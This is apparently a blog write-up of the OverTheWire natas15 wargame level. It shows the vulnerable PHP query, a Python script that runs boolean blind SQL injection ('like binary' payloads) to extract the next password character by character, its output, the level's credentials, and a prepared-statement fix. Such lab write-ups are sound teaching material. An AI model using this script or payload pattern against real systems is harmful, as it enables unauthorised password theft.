Overthewire-natas15

Overthewire level 15 to level 16

What differs in this level from level 14 is that the page only tells us whether a user exists; it does not directly tell us the password. The page source is as follows

if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas15', '<censored>');
    mysql_select_db('natas15', $link);

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysql_query($query, $link);
    if($res) {
        if(mysql_num_rows($res) > 0) {
            echo "This user exists.<br>";
        } else {
            echo "This user doesn't exist.<br>";
        }
    } else {
        echo "Error in query.<br>";
    }

    mysql_close($link);
}

Let's first try an arbitrary lookup. Entering the username natas16... it exists...
So how can we make use of this username? The site gives us one more piece of information

CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);

So this level should be about obtaining the password from the username, but since the only thing the site echoes is whether the user exists, we need to write a script that brute-forces the password character by character, using the "user exists" response as the oracle. The code is as follows

import requests

target = 'http://natas15.natas.labs.overthewire.org/index.php'

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'

filtered = ''   # characters that occur somewhere in the password
passwd = ''     # password prefix recovered so far

# Step 1: find which characters occur in the password at all.
# LIKE BINARY makes the match case-sensitive; the trailing '#' comments out
# the closing quote of the original query.
for char in chars:
    payload = {'username': f'natas16" and password like binary "%{char}%"#'}
    resp = requests.post(target, auth=('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data=payload)
    if 'exists' in resp.text:
        filtered += char
        print(filtered)

# Step 2: extend the known prefix one character at a time, trying only the
# characters found in step 1. natas passwords are 32 characters long.
for _ in range(32):
    for char in filtered:
        payload = {'username': f'natas16" and password like binary "{passwd + char}%"#'}
        resp = requests.post(target, auth=('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data=payload)
        if 'exists' in resp.text:
            passwd += char
            print(passwd)
            break

The script's output is as follows

a
ac
ace
aceh
acehi
acehij
acehijm
acehijmn
acehijmnp
acehijmnpq
acehijmnpqt
acehijmnpqtw
acehijmnpqtwB
acehijmnpqtwBE
acehijmnpqtwBEH
acehijmnpqtwBEHI
acehijmnpqtwBEHIN
acehijmnpqtwBEHINO
acehijmnpqtwBEHINOR
acehijmnpqtwBEHINORW
acehijmnpqtwBEHINORW3
acehijmnpqtwBEHINORW35
acehijmnpqtwBEHINORW356
acehijmnpqtwBEHINORW3569
acehijmnpqtwBEHINORW35690
W
Wa
WaI
WaIH
WaIHE
WaIHEa
WaIHEac
WaIHEacj
WaIHEacj6
WaIHEacj63
WaIHEacj63w
WaIHEacj63wn
WaIHEacj63wnN
WaIHEacj63wnNI
WaIHEacj63wnNIB
WaIHEacj63wnNIBR
WaIHEacj63wnNIBRO
WaIHEacj63wnNIBROH
WaIHEacj63wnNIBROHe
WaIHEacj63wnNIBROHeq
WaIHEacj63wnNIBROHeqi
WaIHEacj63wnNIBROHeqi3
WaIHEacj63wnNIBROHeqi3p
WaIHEacj63wnNIBROHeqi3p9
WaIHEacj63wnNIBROHeqi3p9t
WaIHEacj63wnNIBROHeqi3p9t0
WaIHEacj63wnNIBROHeqi3p9t0m
WaIHEacj63wnNIBROHeqi3p9t0m5
WaIHEacj63wnNIBROHeqi3p9t0m5n
WaIHEacj63wnNIBROHeqi3p9t0m5nh
WaIHEacj63wnNIBROHeqi3p9t0m5nhm
WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

Process finished with exit code 0

So the password is WaIHEacj63wnNIBROHeqi3p9t0m5nhmh....
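The oracle above only works because the username is spliced straight into the SQL string. For contrast, here is the same lookup written with a mysqli prepared statement; this is an added example, not the natas15 source, and it assumes the same connection details while dropping the `debug` echo of the query:

```php
<?php
// Added example, not the natas15 source: the same user-exists check with the
// username bound as a parameter, so quotes, AND/OR and '#' in the input are
// treated as plain characters rather than SQL.
if (array_key_exists("username", $_REQUEST)) {
    // Assumed: same host, user and database as the original snippet.
    $link = new mysqli('localhost', 'natas15', '<censored>', 'natas15');
    if ($link->connect_error) {
        echo "Error in query.<br>";
        exit;
    }

    // The '?' placeholder is the only thing the SQL parser sees.
    $stmt = $link->prepare("SELECT 1 FROM users WHERE username = ? LIMIT 1");
    $stmt->bind_param("s", $_REQUEST["username"]);
    $stmt->execute();
    $stmt->store_result();

    if ($stmt->num_rows > 0) {
        echo "This user exists.<br>";
    } else {
        echo "This user doesn't exist.<br>";
    }

    $stmt->close();
    $link->close();
}
```

With the parameter bound, a username of `natas16" and password like binary "W%"#` is looked up literally and reports "doesn't exist", so the per-character oracle disappears.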

posted @ 2021-05-26 09:18  wudiiv11